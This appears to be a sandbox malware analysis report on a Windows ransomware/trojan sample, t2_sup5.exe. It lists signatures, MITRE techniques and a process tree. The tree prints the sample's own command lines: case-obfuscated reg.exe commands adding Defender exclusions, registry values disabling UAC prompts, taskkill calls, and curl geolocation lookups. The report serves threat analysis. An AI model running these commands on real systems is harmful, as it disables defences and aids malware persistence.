615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8

Resubmissions

25-01-2023 07:44

230125-jktlcaha3x 10

Analysis

max time kernel
150s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25-01-2023 07:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

t2_sup5.exe
Size

23.2MB
MD5

0c952979e2d76f8ec17ff34a8023b82b
SHA1

7406c03065315f5dd6d84e9443c2f0e92a666c0a
SHA256

615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8
SHA512

6f6cb2e2606602a74a554b610c4baeb0fb6fe8b310429be330e08e6f1102ea95f36fc80fd981402e40fef652a1da5909eeb154cd4dcbd841bdbf9a0a1834278b
SSDEEP

393216:RXZVmGOIszfE1/giQkQJ/y2OFsaetMhSEiCjjngIlGZi4zym8nmjKAO9wV3ajcv1:NOm/giQP/yWaeiSEikjnRYjzMmW99IFP

Score

10^/10

discovery evasion exploit ransomware trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1"	reg.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	reg.exe

Windows security bypass 2 TTPs 8 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reG.exereG.eXeobs64.tmpr.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\sCr = "0"	reG.exe
Key created	\REGISTRY\MACHINE\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs	reG.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\cMd = "0"	reG.eXe
Key created	\REGISTRY\MACHINE\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns	obs64.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\exe = "0"	obs64.tmp
Key created	\REGISTRY\MACHINE\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS	r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\sYSTeM32\drIvers\etC\hOsts = "0"	r.exe
Key created	\REGISTRY\MACHINE\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns	reG.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Executes dropped EXE 23 IoCs

Processes:

t2_sup5.tmpt2_sup5.tmpr.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.exeobs64.tmpobs64.exer.exeobs64.tmpobs64.scrobs64.sCr

pid	process
1932	t2_sup5.tmp
2012	t2_sup5.tmp
1640	r.exe
948	r.exe
2020	r.exe
972	r.exe
1176	r.exe
564	r.exe
1528	r.exe
1376	r.exe
1992	r.exe
956	r.exe
1640	r.exe
1948	r.exe
108	r.exe
1572	r.exe
1088	obs64.exe
1556	obs64.tmp
1500	obs64.exe
1204	r.exe
1612	obs64.tmp
340	obs64.scr
544	obs64.sCr

Possible privilege escalation attempt 5 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2016 takeown.exe
1180 icacls.exe
972 icacls.exe
1572 icacls.exe
1536 icacls.exe
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1204 attrib.exe
1904 attrib.exe
1588 attrib.exe
1980 attrib.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1996 cmd.exe
Drops startup file 1 IoCs

Processes:

t2_sup5.tmp

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk t2_sup5.tmp

pid	process
2016	takeown.exe
1180	icacls.exe
972	icacls.exe
1572	icacls.exe
1536	icacls.exe

pid	process
1204	attrib.exe
1904	attrib.exe
1588	attrib.exe
1980	attrib.exe

pid	process
1996	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk	t2_sup5.tmp

Loads dropped DLL 29 IoCs

Processes:

t2_sup5.exet2_sup5.tmpt2_sup5.exet2_sup5.tmprundll32.exerundll32.execmd.exeobs64.exeobs64.tmpobs64.exeobs64.tmp

pid	process
552	t2_sup5.exe
1932	t2_sup5.tmp
1932	t2_sup5.tmp
1828	t2_sup5.exe
2012	t2_sup5.tmp
2012	t2_sup5.tmp
888	rundll32.exe
888	rundll32.exe
888	rundll32.exe
888	rundll32.exe
824	rundll32.exe
824	rundll32.exe
824	rundll32.exe
824	rundll32.exe
1564	cmd.exe
1564	cmd.exe
1564	cmd.exe
1564	cmd.exe
1564	cmd.exe
2012	t2_sup5.tmp
1088	obs64.exe
1556	obs64.tmp
1556	obs64.tmp
1556	obs64.tmp
1500	obs64.exe
1612	obs64.tmp
1612	obs64.tmp
1612	obs64.tmp
1612	obs64.tmp

Modifies file permissions 1 TTPs 5 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1572 icacls.exe
1536 icacls.exe
2016 takeown.exe
1180 icacls.exe
972 icacls.exe

pid	process
1572	icacls.exe
1536	icacls.exe
2016	takeown.exe
1180	icacls.exe
972	icacls.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

obs64.tmpr.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns	obs64.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\exe = "0"	obs64.tmp
Key created	\REGISTRY\MACHINE\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS	r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\sYSTeM32\drIvers\etC\hOsts = "0"	r.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

rundll32.exeobs64.scr

pid process

824 rundll32.exe
824 rundll32.exe
340 obs64.scr
340 obs64.scr
340 obs64.scr
340 obs64.scr
Suspicious use of SetThreadContext 1 IoCs

Processes:

obs64.scr

description pid process target process

PID 340 set thread context of 544 340 obs64.scr obs64.sCr
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20230125084426.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1924 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

604 vssadmin.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1432 taskkill.exe
1760 taskkill.exe
1980 taskkill.exe

pid	process
824	rundll32.exe
824	rundll32.exe
340	obs64.scr
340	obs64.scr
340	obs64.scr
340	obs64.scr

description	pid	process	target process
PID 340 set thread context of 544	340	obs64.scr	obs64.sCr

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20230125084426.cab	makecab.exe

pid	process
1924	schtasks.exe

pid	process
604	vssadmin.exe

pid	process
1432	taskkill.exe
1760	taskkill.exe
1980	taskkill.exe

Modifies data under HKEY_USERS 12 IoCs

Processes:

r.exer.exer.exer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

t2_sup5.tmprundll32.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.tmpobs64.scr

pid	process
2012	t2_sup5.tmp
2012	t2_sup5.tmp
824	rundll32.exe
824	rundll32.exe
1640	r.exe
1640	r.exe
2020	r.exe
2020	r.exe
1176	r.exe
1176	r.exe
948	r.exe
948	r.exe
564	r.exe
564	r.exe
1528	r.exe
1528	r.exe
1948	r.exe
1948	r.exe
108	r.exe
108	r.exe
972	r.exe
972	r.exe
1612	obs64.tmp
1612	obs64.tmp
340	obs64.scr
340	obs64.scr

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

taskkill.exer.exetakeown.exetaskkill.exer.exer.exer.exer.exevssvc.exer.exer.exer.exer.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1640	r.exe
Token: SeAssignPrimaryTokenPrivilege	1640	r.exe
Token: SeIncreaseQuotaPrivilege	1640	r.exe
Token: SeTakeOwnershipPrivilege	2016	takeown.exe
Token: 0	1640	r.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	2020	r.exe
Token: SeAssignPrimaryTokenPrivilege	2020	r.exe
Token: SeIncreaseQuotaPrivilege	2020	r.exe
Token: 0	2020	r.exe
Token: SeDebugPrivilege	948	r.exe
Token: SeAssignPrimaryTokenPrivilege	948	r.exe
Token: SeIncreaseQuotaPrivilege	948	r.exe
Token: SeDebugPrivilege	1176	r.exe
Token: SeAssignPrimaryTokenPrivilege	1176	r.exe
Token: SeIncreaseQuotaPrivilege	1176	r.exe
Token: 0	1176	r.exe
Token: SeDebugPrivilege	972	r.exe
Token: SeAssignPrimaryTokenPrivilege	972	r.exe
Token: SeIncreaseQuotaPrivilege	972	r.exe
Token: SeBackupPrivilege	1160	vssvc.exe
Token: SeRestorePrivilege	1160	vssvc.exe
Token: SeAuditPrivilege	1160	vssvc.exe
Token: SeDebugPrivilege	564	r.exe
Token: SeAssignPrimaryTokenPrivilege	564	r.exe
Token: SeIncreaseQuotaPrivilege	564	r.exe
Token: SeDebugPrivilege	1528	r.exe
Token: SeAssignPrimaryTokenPrivilege	1528	r.exe
Token: SeIncreaseQuotaPrivilege	1528	r.exe
Token: 0	1528	r.exe
Token: SeDebugPrivilege	1948	r.exe
Token: SeAssignPrimaryTokenPrivilege	1948	r.exe
Token: SeIncreaseQuotaPrivilege	1948	r.exe
Token: 0	1948	r.exe
Token: SeDebugPrivilege	108	r.exe
Token: SeAssignPrimaryTokenPrivilege	108	r.exe
Token: SeIncreaseQuotaPrivilege	108	r.exe
Token: SeDebugPrivilege	1432	taskkill.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

t2_sup5.tmpobs64.tmp

pid process

2012 t2_sup5.tmp
1612 obs64.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

obs64.scr

pid process

340 obs64.scr

pid	process
340	obs64.scr

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

t2_sup5.exet2_sup5.tmpcmd.exet2_sup5.exet2_sup5.tmprundll32.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 552 wrote to memory of 1932	552	t2_sup5.exe	t2_sup5.tmp
PID 1932 wrote to memory of 1928	1932	t2_sup5.tmp	cmd.exe
PID 1932 wrote to memory of 1928	1932	t2_sup5.tmp	cmd.exe
PID 1932 wrote to memory of 1928	1932	t2_sup5.tmp	cmd.exe
PID 1932 wrote to memory of 1928	1932	t2_sup5.tmp	cmd.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1932 wrote to memory of 1828	1932	t2_sup5.tmp	t2_sup5.exe
PID 1928 wrote to memory of 1760	1928	cmd.exe	taskkill.exe
PID 1928 wrote to memory of 1760	1928	cmd.exe	taskkill.exe
PID 1928 wrote to memory of 1760	1928	cmd.exe	taskkill.exe
PID 1928 wrote to memory of 1760	1928	cmd.exe	taskkill.exe
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 1828 wrote to memory of 2012	1828	t2_sup5.exe	t2_sup5.tmp
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 2012 wrote to memory of 888	2012	t2_sup5.tmp	rundll32.exe
PID 888 wrote to memory of 824	888	rundll32.exe	rundll32.exe
PID 888 wrote to memory of 824	888	rundll32.exe	rundll32.exe
PID 888 wrote to memory of 824	888	rundll32.exe	rundll32.exe
PID 888 wrote to memory of 824	888	rundll32.exe	rundll32.exe
PID 2012 wrote to memory of 1564	2012	t2_sup5.tmp	cmd.exe
PID 2012 wrote to memory of 1564	2012	t2_sup5.tmp	cmd.exe
PID 2012 wrote to memory of 1564	2012	t2_sup5.tmp	cmd.exe
PID 2012 wrote to memory of 1564	2012	t2_sup5.tmp	cmd.exe
PID 1380 wrote to memory of 1112	1380	WScript.exe	cmd.exe
PID 1380 wrote to memory of 1112	1380	WScript.exe	cmd.exe
PID 1380 wrote to memory of 1112	1380	WScript.exe	cmd.exe
PID 1112 wrote to memory of 1572	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1572	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1572	1112	cmd.exe	reg.exe
PID 1564 wrote to memory of 1640	1564	cmd.exe	r.exe
PID 1564 wrote to memory of 1640	1564	cmd.exe	r.exe
PID 1564 wrote to memory of 1640	1564	cmd.exe	r.exe
PID 1564 wrote to memory of 1640	1564	cmd.exe	r.exe
PID 1112 wrote to memory of 1832	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1832	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1832	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1536	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1536	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1536	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1964	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1964	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1964	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1916	1112	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1204 attrib.exe
1904 attrib.exe
1588 attrib.exe
1980 attrib.exe

pid	process
1204	attrib.exe
1904	attrib.exe
1588	attrib.exe
1980	attrib.exe

C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe
"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:552

C:\Users\Admin\AppData\Local\Temp\is-GA578.tmp\t2_sup5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GA578.tmp\t2_sup5.tmp" /SL5="$70022,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
3⤵
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe
"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1828

C:\Users\Admin\AppData\Local\Temp\is-GTGTV.tmp\t2_sup5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GTGTV.tmp\t2_sup5.tmp" /SL5="$80022,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-
4⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
6⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\.cmd""
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1564

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
r.exe /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
8⤵
- Executes dropped EXE
PID:1376

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
r.eXe /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
8⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Modifies data under HKEY_USERS
PID:1204

C:\Windows\system32\reG.exe
"C:\Windows\system32\reG.exe" Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
9⤵
- Windows security bypass
PID:980

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
r.exe /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /TI/ /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1992

C:\Windows\system32\reG.eXe
"C:\Windows\system32\reG.eXe" add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
9⤵
- Windows security bypass
PID:1736

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
r.eXe /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
7⤵
- Executes dropped EXE
PID:956

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /TI/ /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1640

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
9⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
r.exe /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108

C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1572

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
9⤵
PID:1204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\g.cmd""
5⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip
6⤵
PID:1832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city
6⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country
6⤵
PID:1824

C:\Windows\SysWOW64\attrib.exe
